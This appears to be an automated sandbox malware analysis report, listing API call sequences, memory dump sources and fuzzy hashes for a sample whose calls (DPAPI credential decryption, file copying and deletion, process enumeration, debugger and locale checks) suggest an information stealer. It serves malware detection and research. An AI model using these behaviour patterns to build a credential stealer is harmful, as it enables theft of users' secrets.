                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425114,?,?,?,004251BC,?,?,00000000,?,00000000), ref: 02301B8A
                                      • StrCmpCA.SHLWAPI(?,00425264), ref: 02301BDA
                                      • StrCmpCA.SHLWAPI(?,0042530C), ref: 02301BF0
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 02301FA7
                                      • DeleteFileA.KERNEL32(00000000), ref: 02302031
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 02302087
                                      • FindClose.KERNEL32(000000FF), ref: 02302099
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                      • String ID:
                                      • API String ID: 1415058207-0
                                      • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                      • Instruction ID: 16b00d336b556f0870620bcebcd5bd0774bd36a1f39b32495453c66f8f500b28
                                      • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                      • Instruction Fuzzy Hash: 8212CA71911258ABCB2DFB60DDA4EEEB77AAF54301F4045ADA50A620D0EF746F88CF50
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 0230E0C5
                                      • StrCmpCA.SHLWAPI(?,004214C8), ref: 0230E115
                                      • StrCmpCA.SHLWAPI(?,004214CC), ref: 0230E12B
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230E647
                                      • FindClose.KERNEL32(000000FF), ref: 0230E659
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2325840235-0
                                      • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction ID: d846f68130264d367be88f0d946ccf3d5b641af607366ae9f66916d1b5ac4570
                                      • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                      • Instruction Fuzzy Hash: 31F19B719152189ACB3DFB60DDA4EEEB77AAF54301F8045DAA04E62090EF346F89CF51
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                      • LocalFree.KERNEL32(00000000), ref: 00417D22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                      • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                      • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                      • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                      APIs
                                      • memset.MSVCRT ref: 0040C853
                                      • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,008786D0), ref: 0040C871
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                      • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                      • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                      • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                      • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                      • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                      • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                      APIs
                                      • memset.MSVCRT ref: 0230CABA
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0230CAD8
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0230CAE3
                                      • memcpy.MSVCRT(?,?,?), ref: 0230CB79
                                      • lstrcat.KERNEL32(?,00420B46), ref: 0230CBAA
                                      • lstrcat.KERNEL32(?,00420B47), ref: 0230CBBE
                                      • lstrcat.KERNEL32(?,00420B4E), ref: 0230CBDF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                      • String ID:
                                      • API String ID: 1498829745-0
                                      • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction ID: f1f8f673bf3a638de196b719db329f2680de9fda1774ca2ac54fcd20434d3749
                                      • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                      • Instruction Fuzzy Hash: AE41607894421AEFDB10DFD0DC98BEEBBB9FB44304F1045A9E509A6280D7745B84CFA1
                                      APIs
                                      • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,008786A0,?,0042110C,?,00000000,?), ref: 0041696C
                                      • sscanf.NTDLL ref: 00416999
                                      • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,008786A0,?,0042110C), ref: 004169B2
                                      • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008786A0,?,0042110C), ref: 004169C0
                                      • ExitProcess.KERNEL32 ref: 004169DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$System$File$ExitProcesssscanf
                                      • String ID: B
                                      • API String ID: 2533653975-2248957098
                                      • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                      • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                      • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                      • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                      • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID: N@
                                      • API String ID: 4291131564-4229412743
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                      • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 02317E48
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02317E60
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 02317E74
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02317EC9
                                      • LocalFree.KERNEL32(00000000), ref: 02317F89
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID:
                                      • API String ID: 3090951853-0
                                      • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction ID: 7d3fe78dde39546042320d664619cea79417313b85f3fb67e3fc1bf4864bfbb3
                                      • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                      • Instruction Fuzzy Hash: 55414C71941218ABDB28DF94DD88FEEB7B9FB48705F1041D9E00AA6190DB742F85CFA0
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                      • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0231BE09
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0231BE1E
                                      • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0231BE29
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0231BE45
                                      • TerminateProcess.KERNEL32(00000000), ref: 0231BE4C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction ID: 765a9a4e3db10b4df7821155ec3c23ae37dac8129afe039f10a6f596730e4a40
                                      • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                      • Instruction Fuzzy Hash: 3C21A0BC9002059FDB14DF69F8896967BF5FB0A314F50403AE90A872A4EBB05981EF49
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 3657800372-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 023074B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 023074BB
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 023074E8
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 0230750B
                                      • LocalFree.KERNEL32(?), ref: 02307515
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction ID: 45630c6271d2f57894d575792b5648b327a6ec6066b6f3c2adca00e17902538c
                                      • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                      • Instruction Fuzzy Hash: 7C010075A80208BBEB10DFD4DD45F9D77B9EB45704F104155F705AA2C0D670AA01CB65
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                      • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02319885
                                      • Process32First.KERNEL32(00420ACA,00000128), ref: 02319899
                                      • Process32Next.KERNEL32(00420ACA,00000128), ref: 023198AE
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 023198C3
                                      • CloseHandle.KERNEL32(00420ACA), ref: 023198E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction ID: 89d1331c42da0ab26bab027bd5c7e13bcaf4bab7a9bc98089bd8ab841006ee6f
                                      • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                      • Instruction Fuzzy Hash: 4B010C79A50208FFDB24DFE4CD54BEDB7F9EB49700F004189A505A6240D7749A40CF51
                                      APIs
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 0230E709
                                      • StrCmpCA.SHLWAPI(?,004214F8), ref: 0230E759
                                      • StrCmpCA.SHLWAPI(?,004214FC), ref: 0230E76F
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0230EE46
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID:
                                      • API String ID: 433455689-0
                                      • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction ID: 99b49aa6f93fe456c25b98f3b5d81d7291ecd207f261f2b121aca48997aac7ac
                                      • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                      • Instruction Fuzzy Hash: 2512FC72A122189BCB2CFB60DDA5EED777AAF54301F4045ADA50A92090FF346F88CF51
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                      APIs
                                      • CryptBinaryToStringA.CRYPT32(00000000,023053EB,40000001,00000000,00000000,?,023053EB), ref: 02319127
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptString
                                      • String ID:
                                      • API String ID: 80407269-0
                                      • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction ID: ebe03f2af88e9d2a6cfd8537cf68257402810fcbf1f40d623e6b5c17615e5ac5
                                      • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                      • Instruction Fuzzy Hash: 6D11EC74204204BFDB04CF94DC99FA733AEAF8A754F009568F90A8B251D775E982DB60
                                      APIs
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D56
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,02305155,00000000,?), ref: 02309D68
                                      • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,02305155,00000000,00000000), ref: 02309D91
                                      • LocalFree.KERNEL32(?,?,?,?,02305155,00000000,?), ref: 02309DA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: BinaryCryptLocalString$AllocFree
                                      • String ID:
                                      • API String ID: 4291131564-0
                                      • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                      • Instruction ID: 8f3398f579b07bb600967f4a095249fa48bd55439fe1ee01e1ccee1077bcd2f3
